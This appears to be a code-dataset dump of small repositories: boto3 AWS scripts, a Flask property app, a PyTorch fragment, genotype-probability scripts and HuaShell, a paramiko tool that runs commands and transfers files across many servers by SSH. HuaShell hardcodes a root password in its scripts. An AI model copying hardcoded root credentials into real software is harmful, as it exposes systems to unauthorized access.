init_hidden(self):\n return (Variable(torch.zeros(self.batch_size, self.hidden_size).cuda()), \n Variable(torch.zeros(self.batch_size, self.hidden_size).cuda()))\n\n\n\n def reparameterize(self, mu, logvar):\n if self.training:\n logvar = logvar.mul(0.5).exp_()\n eps = Variable(logvar.data.new(logvar.size()).normal_())\n return eps.mul(logvar).add_(mu)\n else:\n return mu\n\n def forward(self, input):\n embedded = self.embed(input.view(-1, self.input_size))\n self.hidden = self.lstm(embedded, self.hidden)\n mu = self.mu_net(self.hidden[0])\n logvar = self.logvar_net(self.hidden[0])\n z = self.reparameterize(mu, logvar)\n return z, mu, logvar\n \n"
}
] | 3 |
anandg112/Boto3-recipes | https://github.com/anandg112/Boto3-recipes | 4559533d21653a24fbc6d811b1a8a4f96dc9d0a8 | 7abebae6cac76cc9d83b43364235b0badbe1cb7a | 01217c84e0c65797e834cc2684dfc36a8cfdc9b7 | refs/heads/master | 2021-09-12T09:47:27.265879 | 2018-04-16T02:14:25 | 2018-04-16T02:14:25 | 124,609,527 | 2 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.7017543911933899,
"alphanum_fraction": 0.7222222089767456,
"avg_line_length": 21.866666793823242,
"blob_id": "7a7ca59336557731f017a04df5c8d3a67f9f530c",
"content_id": "fef9e2551c3374a51820232dd5f8c0de514c0acc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 342,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 15,
"path": "/put_bucket.py",
"repo_name": "anandg112/Boto3-recipes",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n#first argument is bucket name and second argument is file name\n\nimport sys\nimport boto3\ns3 = boto3.resource(\"s3\")\nbucket_name = sys.argv[1]\nobject_name = sys.argv[2]\n\ntry:\n response = s3.Object(bucket_name, object_name).put(Body=open(object_name, 'rb'))\n print response\nexcept Exception as error:\n print error"
},
{
"alpha_fraction": 0.8142856955528259,
"alphanum_fraction": 0.8428571224212646,
"avg_line_length": 33.5,
"blob_id": "009fefede02c50fc415af3e52e753464f358d14f",
"content_id": "03879e9b543181d84c10240717569860dc7b07d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 70,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 2,
"path": "/README.md",
"repo_name": "anandg112/Boto3-recipes",
"src_encoding": "UTF-8",
"text": "# Boto3-Automation\nCloud Infrastructure automation with Python Boto3 \n"
},
{
"alpha_fraction": 0.6788079738616943,
"alphanum_fraction": 0.6887417435646057,
"avg_line_length": 19.200000762939453,
"blob_id": "4a602b8cf42ad55e3fe9486b8d07291d28df11de",
"content_id": "0d385ee9c6f542eed4ed385c770fe853debd979d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 302,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 15,
"path": "/delete_db_instance.py",
"repo_name": "anandg112/Boto3-recipes",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport sys\nimport boto3\n\ndb = sys.argv[1] #name of the instance to be deleted\n\nrds = boto3.client('rds')\ntry:\n response = rds.delete_db_instance(\n DBInstanceIdentifier=db,\n SkipFinalSnapshot=True)\n print (response)\nexcept Exception as error:\n print (error)"
},
{
"alpha_fraction": 0.6544715166091919,
"alphanum_fraction": 0.6788617968559265,
"avg_line_length": 16.285715103149414,
"blob_id": "9877e27775c3f7d4588109df5f2a4e0ad8842102",
"content_id": "f16b84f62f6c5da367b7a1004028700e2cbb5822",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 246,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 14,
"path": "/delete_buckets.py",
"repo_name": "anandg112/Boto3-recipes",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport sys\nimport boto3\n\ns3 = boto3.resource('s3')\n\nfor bucket_name in sys.argv[1:]:\n bucket = s3.Bucket(bucket_name)\ntry:\n respnose = bucket.delete()\n print response\nexcept Exception as error:\n print error\n "
},
{
"alpha_fraction": 0.625,
"alphanum_fraction": 0.649193525314331,
"avg_line_length": 23.799999237060547,
"blob_id": "eff7cb9e743419091cf99d53ad8b312406802472",
"content_id": "192dcada75bbcb69eb2dc536f01680c9572b086f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 248,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 10,
"path": "/create_bucket.py",
"repo_name": "anandg112/Boto3-recipes",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport sys\nimport boto3\ns3 = boto3.resource(\"s3\")\nfor bucket_name in sys.argv[1:]:\n try:\n response = s3.create_bucket(Bucket=bucket_name)\n print (response)\n except Exception as error:\n print (error)\n"
}
] | 5 |
palmer-matthew/info3180-project1 | https://github.com/palmer-matthew/info3180-project1 | 469d6d5357b5f0969abc79cf7063d98a495949cb | be0198c07378065a77018aad18afc8301a082651 | 05e26bc989b1eb688546d402a1f9082e245c8237 | refs/heads/master | 2023-03-19T21:58:15.659861 | 2021-03-17T05:02:02 | 2021-03-17T05:02:02 | 347,273,391 | 0 | 0 | null | 2021-03-13T04:38:08 | 2021-03-13T21:40:06 | 2021-03-17T04:02:10 | null | [
{
"alpha_fraction": 0.6002490520477295,
"alphanum_fraction": 0.6251556873321533,
"avg_line_length": 31.15999984741211,
"blob_id": "ab38c223648d9bd2e1c91cf0175a56ece564a811",
"content_id": "15a2bd32eef93b3dec751953581adcc0de6065ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 803,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 25,
"path": "/app/models.py",
"repo_name": "palmer-matthew/info3180-project1",
"src_encoding": "UTF-8",
"text": "from . import db\n\nclass Property(db.Model):\n\n __tablename__ = 'property'\n\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n title = db.Column(db.String(150))\n description = db.Column(db.String(255))\n no_room = db.Column(db.String(10))\n no_bath = db.Column(db.String(10))\n price = db.Column(db.String(20))\n type = db.Column(db.String(20))\n location = db.Column(db.String(150))\n filename = db.Column(db.String(255)) \n\n def __init__(self, title, description, no_room, no_bath, price, type, location, filename):\n self.title = title\n self.description = description\n self.no_room = no_room\n self.no_bath = no_bath\n self.price = price\n self.type = type\n self.location = location\n self.filename = filename"
},
{
"alpha_fraction": 0.6464007496833801,
"alphanum_fraction": 0.6590467095375061,
"avg_line_length": 40.979591369628906,
"blob_id": "08737aebcc069a85382cde1d757aea0a662f0b4f",
"content_id": "f215efed2cea93071fa804d702dcac6f2c0ef9fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2056,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 49,
"path": "/app/forms.py",
"repo_name": "palmer-matthew/info3180-project1",
"src_encoding": "UTF-8",
"text": "from flask_wtf import FlaskForm\nfrom flask_wtf.file import FileAllowed, FileRequired, FileField\nfrom wtforms.fields import StringField, TextAreaField, IntegerField, DecimalField, SelectField\nfrom wtforms.validators import InputRequired, ValidationError\nfrom re import match\n\n# Custom Validators \ndef length_check(max = -1):\n def length(form, field):\n if len(field.data) > max:\n raise ValidationError('Data is greater than {} characters'.format(max)) \n return length\n\ndef valid_number(form, field):\n def isInt(n):\n try:\n int(n)\n except:\n return False\n return True\n \n def isFloat(n):\n try:\n float(n)\n except:\n # Reg expression retrieved from https://stackoverflow.com/questions/5917082/regular-expression-to-match-numbers-with-or-without-commas-and-decimals-in-text\n # Contributor: Justin Morgan, Retrieved on March 16, 2021\n if match(r'^(\\d*\\.?\\d+|\\d{1,3}(,\\d{3})*(\\.\\d+)?)$', n) != None:\n return True\n return False\n return True\n\n if isInt(field.data) or isFloat(field.data):\n pass\n else:\n raise ValidationError('Value entered is not a valid integer or decimal') \n\n\n\nclass PropertyForm(FlaskForm):\n \n title = StringField('Property Title', validators=[InputRequired(), length_check(max=145)])\n description = TextAreaField('Description', validators=[InputRequired(), length_check(max=255)])\n roomnum = StringField('No. of Rooms', validators=[InputRequired(), valid_number])\n bathnum = StringField('No. of Bathrooms', validators=[InputRequired(), valid_number])\n price = StringField('Price', validators=[InputRequired(), valid_number])\n type = SelectField('Property Type',validators=[InputRequired()], choices=[('House', 'House'), ('Apartment', 'Apt')])\n location = StringField('Location', validators=[InputRequired(), length_check(max=150)])\n photo = FileField('Photo Upload', validators= [FileRequired(), FileAllowed(['jpg','png','Images only!'])])"
}
] | 2 |
liupeng110/HuaShell | https://github.com/liupeng110/HuaShell | ecff98b83262cf84b1d4921e89054e43a24c5822 | cee8218dcfc4be746026d899249a4cdd5fc2269e | 05879da0b550b118f2aa2659f098075b610b63fe | refs/heads/master | 2021-01-16T15:41:50.832838 | 2019-04-02T03:08:26 | 2019-04-02T03:08:26 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6042810082435608,
"alphanum_fraction": 0.6086717844009399,
"avg_line_length": 20.951807022094727,
"blob_id": "1843f4911348e926727a3d868385fac81b737286",
"content_id": "f5b51ef2b060b50c50815e540acd424baf3a8c74",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2240,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 83,
"path": "/HuaShell.py",
"repo_name": "liupeng110/HuaShell",
"src_encoding": "UTF-8",
"text": "from py_ssh.ssh_py import ssh2,download,upload\nimport datetime\nimport os\nimport threading\n\nopera= input('''\n\t* 首先请确保已经在 ./params文件夹中 填好了必要参数\n\t================================================\n\t================================================\n\t1.批量输入命令\n\t2.批量上传文件\n\t3.批量下载文件\n\n\t$你要执行什么操作(输入序号):''')\nif opera == '1':\n\t#cmd\n\t#读取账号、密码\n\tusername = 'root'\n\tpassword = 'Passwd@root&2018'\n\t#读取命令\n\tcmds_f=open(\".\\\\params\\\\cmds.txt\")\n\tcmds=cmds_f.readlines()\n\tcmds_f.close()\n #读取服务器列表\n\thosts_f=open(\".\\\\params\\\\ip_list.txt\")\n\thosts=hosts_f.readlines()\n\thosts_f.close()\n\tfor host_ip in hosts:\n\t\thost_ip = host_ip.strip()\n\t\ta=threading.Thread(target=ssh2,args=(host_ip,username,password,cmds))\n\t\ta.start()\n\nelif opera == '2':\n\t#upload\n\tdst_dir_path = input('请输入上传目的目录路径(直接回车默认上传至/tmp/):')\n\tif dst_dir_path == '':\n\t\tdst_dir_path = '/tmp/'\n\t\n\t#读取账号、密码\n\tusername = 'root'\n\tpassword = 'Passwd@root&2018'\n\t#读取上传文件所在文件夹路径\n\tupload_dir = '.\\\\upload_dir'\n\t#读取服务器列表\n\thosts_f=open(\".\\\\params\\\\ip_list.txt\")\n\thosts=hosts_f.readlines()\n\thosts_f.close()\n\n\tfor host_ip in hosts:\n\t\thost_ip = host_ip.strip()\n\t\n\t\ta=threading.Thread(target=upload,args=(host_ip,username,password,upload_dir,dst_dir_path))\n\t\ta.start()\n\n\nelif opera =='3':\n\t#download\n\tprint('友情提示:确保下载源的文件夹无嵌套文件夹,下载目的文件夹是空文件夹')\n\tprint('-------------------------------------------------------------')\n\tsrc_dir_path = input('请输入下载源的路径文件夹(直接回车默认上传至/tmp/):')\n\tif src_dir_path == '':\n\t\tsrc_dir_path = '/tmp/'\n\t#读取账号、密码\n\tusername = 'root'\n\tpassword = 'Passwd@root&2018'\n\t#读取下载文件目的文件夹路径\n\tdownload_dir = '.\\\\download_dir'\n\t#读取服务器列表\n\thosts_f=open(\".\\\\params\\\\ip_list.txt\")\n\thosts=hosts_f.readlines()\n\thosts_f.close()\n\t\n\tfor host_ip in hosts:\n\t\thost_ip = host_ip.strip()\n\n\t\ta=threading.Thread(target=download,args=(host_ip,username,password,download_dir,src_dir_path))\n\t\ta.start()\n\n\nelse:\n\tprint('请输入序号!')\n\ninput('')\n"
},
{
"alpha_fraction": 0.5754671692848206,
"alphanum_fraction": 0.6008625030517578,
"avg_line_length": 20.090909957885742,
"blob_id": "8a8ca8ca9ba9c04ffd15bfdeb2da78636a0a2d28",
"content_id": "f4b1c4bed8cff06af2e51ad795145390a72b1d0f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2273,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 99,
"path": "/py_ssh/ip_range.py",
"repo_name": "liupeng110/HuaShell",
"src_encoding": "UTF-8",
"text": "def isIP(str1):\n\ttag = True\n\tstr1 = str1.strip()\n\tsection_num = len(str1.split('.')) # section_num == 4\n\tif section_num != 4 :\n\t\ttag = False\n\t\treturn tag\n\n\ttry:\n\t\tfor i in range(0,4):\n\t\t\tif int(str1.split('.')[i]) < 0 :\n\t\t\t\ttag = False\n\t\t\t\tbreak\n\t\t\telif int(str1.split('.')[i]) > 255 :\n\t\t\t\ttag = False\n\t\t\t\tbreak\n\texcept :\n\t\ttag = False\n\tfinally:\n\t\treturn tag\n\n\ndef isIPrange(str1):\n\tstr1 = str1.strip()\n\tif isIP(str1.split(',')[0].split('-')[0]) :\n\t\treturn True\n\telse:\n\t\treturn False\n\n\ndef iprange_to_list(ip_range):\n\tip_list = []\n\tip_range = ip_range.strip()\n\tcomma_section_num = len(ip_range.split(','))\n\tcomma_section = ip_range.split(',')\n\tfor i in range(0,comma_section_num):\n\t\tcur_comma_section = comma_section[i].strip()\n\t\tif len(cur_comma_section.split('-')) == 2:\n\t\t\t#有范围,eg: 192.168.1.1-100\n\t\t\tstart_ip = cur_comma_section.split('-')[0]\n\t\t\tstart_ip_d = int(start_ip.split('.')[3])\n\t\t\tend_ip_d = int(cur_comma_section.split('-')[1])\n\t\t\tip_abc = start_ip.split('.')[0]+'.'+start_ip.split('.')[1]+'.'+start_ip.split('.')[2]\n\t\t\tfor d in range(start_ip_d,end_ip_d+1):\n\t\t\t\tcur_ip = ip_abc+'.'+str(d)\n\t\t\t\tip_list.append(cur_ip)\n\n\t\telif len(cur_comma_section.split('-')) == 1:\n\t\t\t#单个IP\n\t\t\tip_list.append(cur_comma_section)\n\t\telse:\n\t\t\tprint('Error:IP_range输入格式不合规')\n\t\t\treturn -1\n\treturn ip_list\n\n\n\n\n\n\ndef ip_parse(str1):\n\t#输入的如果是IP range,则返回ip_list\n\t#输入的如果是文件,则返回文件中的ip_list\n\tip_list = []\n\tstr1 = str1.strip()\n\tif isIPrange(str1) :\n\t\t#输入的是ip range\n\t\tip_list = iprange_to_list(str1)\n\t\tfor host in ip_list:\n\t\t\tif not isIP(host):\n\t\t\t\tprint('Error:IP_range输入格式不合规')\n\t\t\t\treturn -1\n\t\t\n\telse :\n\t\t#输入的是文件路径\n\t\twith open(str1,'r') as f:\n\t\t\thosts = f.readlines()\n\t\t\tfor host in hosts:\n\t\t\t\tif isIP(host):\n\t\t\t\t\thost = host.strip('\\n')\n\t\t\t\t\tip_list.append(host)\n\t\t\t\telse:\n\t\t\t\t\tprint('Error:'+str1+'文件中存在不合规ip')\n\t\t\t\t\treturn -1\n\treturn ip_list\n\n\nif __name__=='__main__':\n\t'''\n\tip = input('请输入测试IP:')\n\tprint(isIP(ip))\n\tip_r = input('请输入测试IP_range:')\n\tprint(isIPrange(ip_r))\n\t\n\tip_r = input('请输入测试IP_range:')\n\tprint(iprange_to_list(ip_r))\n\t'''\n\tstr1 = input('请输入测试IP_range或文件路径:')\n\tprint(ip_parse(str1))"
},
{
"alpha_fraction": 0.5914502143859863,
"alphanum_fraction": 0.5957792401313782,
"avg_line_length": 20.22988510131836,
"blob_id": "0ed7b0c8c936d1d5e1c7e0910d97cdfd9f308a58",
"content_id": "e5bd836f9eb49509f1fa7d5c573b4122f21e963f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2308,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 87,
"path": "/HuaShell_pithy.py",
"repo_name": "liupeng110/HuaShell",
"src_encoding": "UTF-8",
"text": "from py_ssh.ssh_py import ssh2_pithy,download,upload\nimport datetime\nimport os\nimport threading\nfrom py_ssh.ip_range import ip_parse\n\nopera= input('''\n\t* 命令手工输入,ip手工指定\n\t================================================\n\t================================================\n\t1.批量输入命令\n\t2.批量上传文件\n\t3.批量下载文件\n\n\t$你要执行什么操作(输入序号):''')\nif opera == '1':\n\t#cmd\n\t#读取账号、密码\n\tusername = 'root'\n\tpassword = 'Passwd@root&2018'\n\n\n #读取服务器列表\n\tstr_ip = input('请输入IP_range或ip_list文件路径:')\n\thosts = ip_parse(str_ip)\n\t#输入命令\n\twhile True:\n\t\tcmd = input('请输入命令#')\n\t\t\n\t\tif cmd == 'quit' :\n\t\t\tbreak\n\t\telif cmd == 'show help':\n\t\t\tprint('''\t\tshow help help file\n\t\tquit quit Huashell''')\n\t\telse:\n\t\t\tfor host_ip in hosts:\n\t\t\t\ta=threading.Thread(target=ssh2_pithy,args=(host_ip,username,password,cmd))\n\t\t\t\ta.start()\n\t\t\t\ta.join()\n\t\t\t\t\n\t\t\t\t\n\nelif opera == '2':\n\t#upload\n\tdst_dir_path = input('请输入上传目的目录路径(直接回车默认上传至/tmp/):')\n\tif dst_dir_path == '':\n\t\tdst_dir_path = '/tmp/'\n\t\n\t#读取账号、密码\n\tusername = 'root'\n\tpassword = 'Passwd@root&2018'\n\t#读取上传文件所在文件夹路径\n\tupload_dir = '.\\\\upload_dir'\n\n\t#读取服务器列表\n\tstr_ip = input('请输入IP_range或ip_list文件路径:')\n\thosts = ip_parse(str_ip)\n\n\n\tfor host_ip in hosts:\t\n\t\ta=threading.Thread(target=upload,args=(host_ip,username,password,upload_dir,dst_dir_path))\n\t\ta.start()\n\n\nelif opera =='3':\n\t#download\n\tprint('友情提示:确保下载源的文件夹无嵌套文件夹,下载目的文件夹是空文件夹')\n\tprint('-------------------------------------------------------------')\n\tsrc_dir_path = input('请输入下载源的路径文件夹(直接回车默认上传至/tmp/):')\n\tif src_dir_path == '':\n\t\tsrc_dir_path = '/tmp/'\n\t#读取账号、密码\n\tusername = 'root'\n\tpassword = 'Passwd@root&2018'\n\t#读取下载文件目的文件夹路径\n\tdownload_dir = '.\\\\download_dir'\n\t#读取服务器列表\n\tstr_ip = input('请输入IP_range或ip_list文件路径:')\n\thosts = ip_parse(str_ip)\n\t\n\tfor host_ip in hosts:\n\t\ta=threading.Thread(target=download,args=(host_ip,username,password,download_dir,src_dir_path))\n\t\ta.start()\n\n\nelse:\n\tprint('请输入序号!')\n\n"
},
{
"alpha_fraction": 0.5211864113807678,
"alphanum_fraction": 0.5355932116508484,
"avg_line_length": 34.01980209350586,
"blob_id": "a34c1a2f4fdb0d395fbe2f7156323d5955b01aa8",
"content_id": "df196d26e40b325b72a50e6d7aeb9e93dfe39708",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3582,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 101,
"path": "/py_ssh/ssh_py.py",
"repo_name": "liupeng110/HuaShell",
"src_encoding": "UTF-8",
"text": "#-*- coding: utf-8 -*-\n#!/usr/bin/python\nimport paramiko\nimport datetime\nimport os\nimport threading\ndef ssh2(ip,username,passwd,cmd):\n try:\n paramiko.util.log_to_file('paramiko________.log')\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip,22,username,passwd,timeout=5)\n for m in cmd:\n stdin,stdout,stderr = ssh.exec_command(m)\n #stdin.write(\"Y\") #简单交互,输入 ‘Y’\n out = stdout.readlines()\n # outerr = stderr.readlines()\n #屏幕输出\n for o in out:\n print (o)\n print ('%s %s\\tOK\\n'%(ip,m))\n ssh.close()\n except :\n print ('%s\\tError\\n'%(ip))\n\ndef ssh2_pithy(ip,username,passwd,cmd):\n try:\n paramiko.util.log_to_file('paramiko________.log')\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip,22,username,passwd,timeout=5)\n \n stdin,stdout,stderr = ssh.exec_command(cmd)\n out = stdout.readlines()\n #屏幕输出\n print ('[%s@%s]#%s\\n'%(username,ip,cmd))\n for o in out:\n print (o) \n ssh.close()\n except :\n print ('%s\\tError\\n'%(ip))\n finally:\n \treturn 1\n\n\ndef download(ip, username, passwd, local_dir, remote_dir):\n try:\n paramiko.util.log_to_file('paramiko_download.log')\n t = paramiko.Transport((ip,22))\n t.connect(username=username,password=passwd)\n sftp = paramiko.SFTPClient.from_transport(t)\n files = sftp.listdir(remote_dir)\n\n\n for f in files:\n print ('')\n print ('############################')\n print ('Beginning to download file from %s %s ' % (ip, datetime.datetime.now()))\n print ('Downloading file:', os.path.join(remote_dir, f))\n sftp.get(os.path.join(remote_dir, f), os.path.join(local_dir, f))#下载\n print ('Download file success %s ' % datetime.datetime.now())\n print ('')\n print ('############################')\n t.close()\n except:\n print (\"connect error!\")\n\n\ndef upload(ip, username, passwd, local_dir, remote_dir):\n try:\n paramiko.util.log_to_file('paramiko_upload.log')\n t = paramiko.Transport((ip, 22))\n t.connect(username=username, password=passwd)\n sftp = paramiko.SFTPClient.from_transport(t)\n #files = sftp.listdir(remote_dir)\n files = os.listdir(local_dir)\n for f in files:\n print ('')\n print ('############################')\n print ('Beginning to upload file to %s %s ' % (ip, datetime.datetime.now()))\n print ('Uploading file:', os.path.join(local_dir, f))\n sftp.put(os.path.join(local_dir, f), os.path.join(remote_dir, f))#上传\n print ('Upload file success %s ' % datetime.datetime.now())\n print ('')\n print ('############################')\n t.close()\n except:\n print (\"connect error!\")\n print (ip, \"fail!\")\n\n\nif __name__=='__main__':\n\n a=threading.Thread(target=ssh2,args=('10.0.0.88','root','123456',['mkdir /root/look_at_this/','ls']))\n a.start()\n \n a=threading.Thread(target=upload,args=('10.0.0.88','root','123456','D:\\\\python-learn\\\\test_upload','/tmp/upload/'))\n a.start()\n \n a=threading.Thread(target=download,args=('10.0.0.88','root','123456','D:\\\\python-learn\\\\test_upload','/root/look_at_this/'))\n a.start()\n "
},
{
"alpha_fraction": 0.5840163826942444,
"alphanum_fraction": 0.6331967115402222,
"avg_line_length": 13.727272987365723,
"blob_id": "33bb052741d4e7a3805044a007192145cc287e67",
"content_id": "34f0cf4fffb88bfe131c29f4258aeba77a1bf970",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 766,
"license_type": "permissive",
"max_line_length": 44,
"num_lines": 33,
"path": "/README.md",
"repo_name": "liupeng110/HuaShell",
"src_encoding": "UTF-8",
"text": "**HuaShell** \n1. 批量执行指定命令:\n需要填好params文件夹里的: \n```\nip_list.txt \t#指定指定服务器的ip列表\ncmds.txt \t#需要批量执行的命令\n```\n2. 批量上传文件:\n* 需要填好params文件夹里的:\n```\nip_list.txt \t#指定指定服务器的ip列表\n```\n* 将需要上传的所有文件都放在upload_dir里\n3. 批量下载文件: \n* 需要填好params文件夹里的:\n```\nip_list.txt \t#指定指定服务器的ip列表\n```\n* 保证download_dir文件夹在批量下载前是空的\n\n---\n**HuaShell_pithy** \n\n* ip可以手动输入ip_range或者文件路径 \n\n > 示例 1.1.1.1-10,2.2.2.2,3.3.3.3-5 \n > 示例 ip_list.txt \n\n* 命令手工输入\n\n---\n**Function Screenshot** \n \n"
}
] | 5 |
ingrid-miriel/PickingClones | https://github.com/ingrid-miriel/PickingClones | 445d705c7a588edefc78d03fc378dd92c42c93b3 | 85828518b2c3e7259eb1fb249892b854461ef9dd | 0def2b8623edbc589c00a680acfc3d43952eca8f | refs/heads/master | 2023-04-06T23:09:12.935709 | 2022-06-14T12:17:08 | 2022-06-14T12:17:08 | 276,872,406 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6227741241455078,
"alphanum_fraction": 0.6412839889526367,
"avg_line_length": 45.39130401611328,
"blob_id": "eadc266413a5007528345ef6dadddd10c39cd8f5",
"content_id": "f46adcb1f00105bf58e0087df1f8716015ba6245",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4269,
"license_type": "no_license",
"max_line_length": 206,
"num_lines": 92,
"path": "/CurveFitting.py",
"repo_name": "ingrid-miriel/PickingClones",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 7 14:19:49 2020\n\n@author: ingrid\n\"\"\"\n\ndef curve_fitting(input, prop_iMLG):\n\n import pandas as pd\n import numpy as np\n \n data = pd.read_csv(input, index_col=0)\n if data.shape[0] < 1000:\n raise ValueError('The CurveFitting script has to be run on the Probs_for_Sample.csv file, which you get after specifying a sample size of interest using the sample = x option in the GenRis script.')\n numgenos = pd.to_numeric(list(data.columns))\n fitting = pd.DataFrame(numgenos)\n mean = np.mean(data, axis = 0)\n fitting['mean'] = mean.values\n perc = np.percentile(data.T, [16, 84], axis = 1) # 68% conf. interval = standard deviation\n perc = perc.T\n perc = pd.DataFrame(perc)\n fitting = pd.merge(fitting, perc, right_index=True, left_index=True)\n fitting = fitting.rename(columns={\"0_x\": \"numgenos\", \"0_y\": \"low_perc\", 1:\"up_perc\"})\n \n lowPerc = fitting[['numgenos', 'low_perc']]\n lowPerc = lowPerc[lowPerc['low_perc'] != 0] # removes numgenos with low_perc=0\n \n upPerc = fitting[['numgenos', 'up_perc']]\n upPerc = upPerc[upPerc['up_perc'] != 0] # removes numgenos with up_perc=0\n \n \n # curve fitting\n import scipy as sp\n from scipy.optimize import curve_fit\n def power_law(x, a, b):\n return a*np.power(x, b)\n # Fit the power-law data\n pars1, cov1 = curve_fit(f=power_law, xdata=fitting['mean'], ydata=fitting['numgenos'], p0=[0, 0], bounds=(-np.inf, np.inf))\n if len(lowPerc.index) > 2: # curve fitting is not possible with too few data points\n pars2, cov2 = curve_fit(f=power_law, xdata=lowPerc['low_perc'], ydata=lowPerc['numgenos'], p0=[0, 0], bounds=(-np.inf, np.inf))\n if len(upPerc.index) > 2: # curve fitting is not possible with too few data points\n pars3, cov3 = curve_fit(f=power_law, xdata=upPerc['up_perc'], ydata=upPerc['numgenos'], p0=[0, 0], bounds=(-np.inf, np.inf))\n \n # Create figure and add axes object\n import matplotlib as mpl\n import matplotlib.pyplot as plt\n mpl.rcParams.update(mpl.rcParamsDefault) \n lowPerc = lowPerc.sort_values(by=['low_perc'], ascending=False) # sort values to get smooth curve\n upPerc = upPerc.sort_values(by=['up_perc'], ascending=False)\n \n fig, ax = plt.subplots()\n ax.plot(fitting['mean'], power_law(fitting['mean'], *pars1), linewidth=2, color='black')\n if len(lowPerc.index) > 2:\n ax.plot(lowPerc['low_perc'], power_law(lowPerc['low_perc'], *pars2), linestyle='--', linewidth=1, color='black')\n else: # the lower precentile for most/all data points is 0\n plt.axvline(x=0, linestyle='--', linewidth=1, color='black')\n if len(upPerc.index) > 2:\n ax.plot(upPerc['up_perc'], power_law(upPerc['up_perc'], *pars3), linestyle='--', linewidth=1, color='black') \n ax.set(xlabel = \"probability of picking identical MLGs\", ylabel = \"number of genotypes\")\n fig.savefig(\"FittedCurve_ProbNumgenos.pdf\")\n \n \n # calculate R square\n f = power_law\n xdata=fitting['mean']\n ydata=fitting['numgenos']\n popt, pcov = curve_fit(f, xdata, ydata)\n residuals = ydata-f(xdata, *popt)\n ss_res = np.sum(residuals**2) \n ss_tot = np.sum((ydata-np.mean(ydata))**2)\n r_squared = round(1 - (ss_res / ss_tot), 3)\n print('R^2 of the curve fitted through the means is', r_squared,'.')\n \n \n # use function to calculate genotype number for specific clone picking probability\n est_mean = round(power_law(prop_iMLG, *pars1), 2)\n if len(lowPerc.index) > 2:\n est_low_perc = round(power_law(prop_iMLG, *pars2), 2)\n else:\n est_low_perc = 0\n if len(upPerc.index) > 2:\n 
est_high_perc = round(power_law(prop_iMLG, *pars3), 2)\n else:\n est_high_perc = \"unknown\"\n print('With a proportion of', prop_iMLG, 'identical MLGs, you can expect around', est_mean, '(',est_low_perc, '< σ <', est_high_perc,') distinct genotypes in your sample.')\n if len(lowPerc.index) < 3 or len(upPerc.index) < 3:\n print('The probability of picking identical MLGs across the chosen number of genotypes is generally too close to 0 to accurately estimate lower and/or upper percentiles.')\n\nif __name__ == \"__main__\":\n curve_fitting()\n"
},
{
"alpha_fraction": 0.5542188286781311,
"alphanum_fraction": 0.5703691244125366,
"avg_line_length": 43.94814682006836,
"blob_id": "0367ed87975b186e471d560879bfdc5193901eea",
"content_id": "c4750da198590c43f0768eb880894a531dbb9c35",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6070,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 135,
"path": "/GenRis.py",
"repo_name": "ingrid-miriel/PickingClones",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 2 10:27:03 2020\n\n@author: ingrid\n\"\"\"\ndef genris(numgenos, days, growthrate, sd, samplesize, mincell, maxcell, **kwargs): \n import numpy as np\n if np.size(days) != 1 or np.size(growthrate) != 1:\n raise ValueError('Days and/or growthrate have each to be defined by exactly one value!')\n # define variables\n elif np.size(numgenos) > 1 and np.size(samplesize) > 1 and np.size(sd) == 1:\n numgenos = np.array(numgenos)\n samplesize = np.array(samplesize)\n sd = np.array([sd])\n array = np.zeros((len(numgenos), len(samplesize), 10))\n x = samplesize\n y = numgenos\n x_title = \"sample size\"\n y_title = \"number of genotypes\"\n z = \"NumgenosSamplesize\"\n elif np.size(sd) > 1 and np.size(samplesize) > 1 and np.size(numgenos) == 1:\n sd = np.array(sd)\n numgenos = np.array([numgenos])\n samplesize = 